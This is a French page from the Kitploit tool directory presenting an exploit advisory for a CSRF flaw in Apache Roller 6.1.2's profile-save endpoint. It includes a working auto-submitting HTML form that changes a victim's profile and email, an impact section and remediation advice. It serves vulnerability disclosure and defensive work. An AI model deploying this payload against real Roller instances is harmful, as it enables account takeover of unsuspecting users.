Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
roller-csrf | Kitploit
Outils/GitHubGitHub/vanlam2001/roller-csrf
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubvanlam2001/roller-csrf

roller-csrf

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Apache Roller v6.1.2 - Falsification de requête intersite (CSRF) dans la mise à jour du profil

Détails de la vulnérabilité

  • Version : v6.1.2
  • Date : 2025-11-09
  • Auteur de l'exploit : Van Lam Nguyen
  • Facebook : https://www.facebook.com/vanlam1412
  • Page d'accueil du fournisseur : https://roller.apache.org
  • Lien du logiciel : https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • Testé sur : Windows
  • CVE : N/A
  • Démo : https://youtu.be/iPEiVzcpJJU

Vue d'ensemble

Il a été découvert que Roller v6.1.2 et versions antérieures contiennent une vulnérabilité de falsification de requête intersite (CSRF) dans le point de terminaison /roller/roller-ui/profile!save.rol.

Cette vulnérabilité permet à un attaquant de mettre à jour arbitrairement les informations du profil de l'utilisateur victime (par exemple, l'e-mail, le nom complet, les paramètres régionaux, le fuseau horaire) via une page HTML spécialement conçue.

Preuve de concept

La vulnérabilité permet des requêtes non autorisées vers /roller/roller-ui/profile!save.rol qui mettent à jour le profil de l'utilisateur sans protection CSRF.

Code d'exploitation HTML

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Paramètres du formulaire

  • bean.userName : vanlam
  • bean.screenName : hacked
  • bean.fullName : hacked
  • bean.emailAddress : [email protected]
  • bean.passwordText : (vide)
  • bean.passwordConfirm : (vide)
  • bean.locale : vi_VN
  • bean.timeZone : Asia/Bangkok

Impact

Un attaquant peut créer une page HTML malveillante qui, lorsqu'elle est consultée par un utilisateur Roller authentifié, soumet automatiquement un formulaire pour mettre à jour les informations du profil de la victime sans son consentement. Cela peut conduire à :

  • Modifications non autorisées des données du profil utilisateur
  • Prise de contrôle potentielle du compte si l'adresse e-mail est modifiée
  • Perturbation de l'expérience utilisateur via les changements de paramètres régionaux et de fuseau horaire

Remédiation

  • Mettre en œuvre des jetons CSRF pour toutes les requêtes modifiant l'état
  • Valider les en-têtes Origin et Referer
  • Utiliser des cookies same-site
  • Mettre en œuvre des contrôles d'authentification et d'autorisation appropriés
Télécharger l’outil